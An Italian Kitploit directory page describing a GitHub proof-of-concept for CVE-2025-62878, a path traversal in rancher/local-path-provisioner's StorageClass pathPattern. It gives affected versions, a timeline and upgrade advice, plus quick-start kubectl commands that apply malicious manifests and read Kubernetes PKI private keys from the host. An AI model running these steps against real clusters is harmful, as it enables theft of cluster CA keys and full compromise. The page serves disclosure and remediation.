Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-62878 — CVE-2025-62878 | Kitploit
Strumenti/GitHubGitHub/kinokopio/cve-2025-62878
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSicurezza CloudConfigurazione ErrataApprendimento e FormazioneLab e Pratica
GitHubkinokopio/cve-2025-62878

CVE-2025-62878

CVE-2025-62878

Vedi Repository
137 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

CVE-2025-62878: Path Traversal del Local Path Provisioner

Panoramica

ElementoValore
ID CVECVE-2025-62878
ID GHSAGHSA-jr3w-9vfr-c746
GravitàCritico (CVSS 10.0)
CWECWE-23 (Relative Path Traversal)
Componente interessatorancher/local-path-provisioner
Versioni interessatev0.0.27 ~ v0.0.32
Versioni correttev0.0.33+

Descrizione della vulnerabilità

Esiste una vulnerabilità di path traversal nel parametro pathPattern di StorageClass. Un utente malintenzionato può manipolare pathPattern utilizzando elementi di percorso relativi (es. ../) per creare PersistentVolumes che puntano a posizioni arbitrarie sul nodo host, bypassando la restrizione della directory di base configurata.

Ciò consente agli attaccanti di:

  • Accedere a file sensibili dell'host (es. /etc/kubernetes/pki/)
  • Sovrascrivere file di sistema critici
  • Ottenere il compromesso completo del cluster rubando le chiavi private di Kubernetes CA

Versioni interessate (Verificate)

Nota: L'avviso ufficiale di GitHub indica che "< 0.0.34" è interessato, ma i nostri test confermano:

  • v0.0.33 è già corretto
  • v0.0.26 e precedenti non sono interessati (la funzionalità pathPattern non esiste)
  • Intervallo effettivamente interessato: v0.0.27 <= versione <= v0.0.32

Cronologia

EventoData
Introduzione funzionalità pathPattern2024-05-26 (commit af85381)
Prima versione vulnerabile (v0.0.27)

Riproduzione

Vedi la directory exploit/ per i passaggi di riproduzione dettagliati e gli script.

Avvio rapido

root@kitploit:~
# 1. Install vulnerable version
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.30/deploy/local-path-storage.yaml

# 2. Apply exploit
kubectl apply -f exploit/malicious-storageclass.yaml
kubectl apply -f exploit/malicious-pvc.yaml
kubectl apply -f exploit/exploit-pod.yaml

# 3. Verify exploitation
kubectl get pv -o jsonpath='{.items[0].spec.hostPath.path}'
# Output: /etc/kubernetes/pki

kubectl exec pki-exploit-pod -- ls -la /stolen-pki/
# Shows Kubernetes PKI certificates and private keys

Rimedio

Aggiorna a v0.0.33 o successiva:

root@kitploit:~
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.33/deploy/local-path-storage.yaml

Riferimenti

  • Avviso GitHub GHSA-jr3w-9vfr-c746
  • Commit di correzione 1ed6b54
  • Commit della funzionalità pathPattern af85381
Scarica lo strumento
VersioneData di rilascioSupporto pathPatternVulnerabile
v0.0.262023-12-03NoSicuro (funzionalità non esistente)
v0.0.272024-05-29SìVulnerabile
v0.0.282024-06-19SìVulnerabile
v0.0.292024-09-03SìVulnerabile
v0.0.302024-10-07SìVulnerabile
v0.0.312025-01-24SìVulnerabile
v0.0.322025-07-31SìVulnerabile
v0.0.332025-12-25SìCorretto
v0.0.342026-01-06SìCorretto
2024-05-29
Commit di correzione2025-12-24 (commit 1ed6b54)
Prima versione corretta (v0.0.33)2025-12-25
Pubblicazione CVE2026-02-04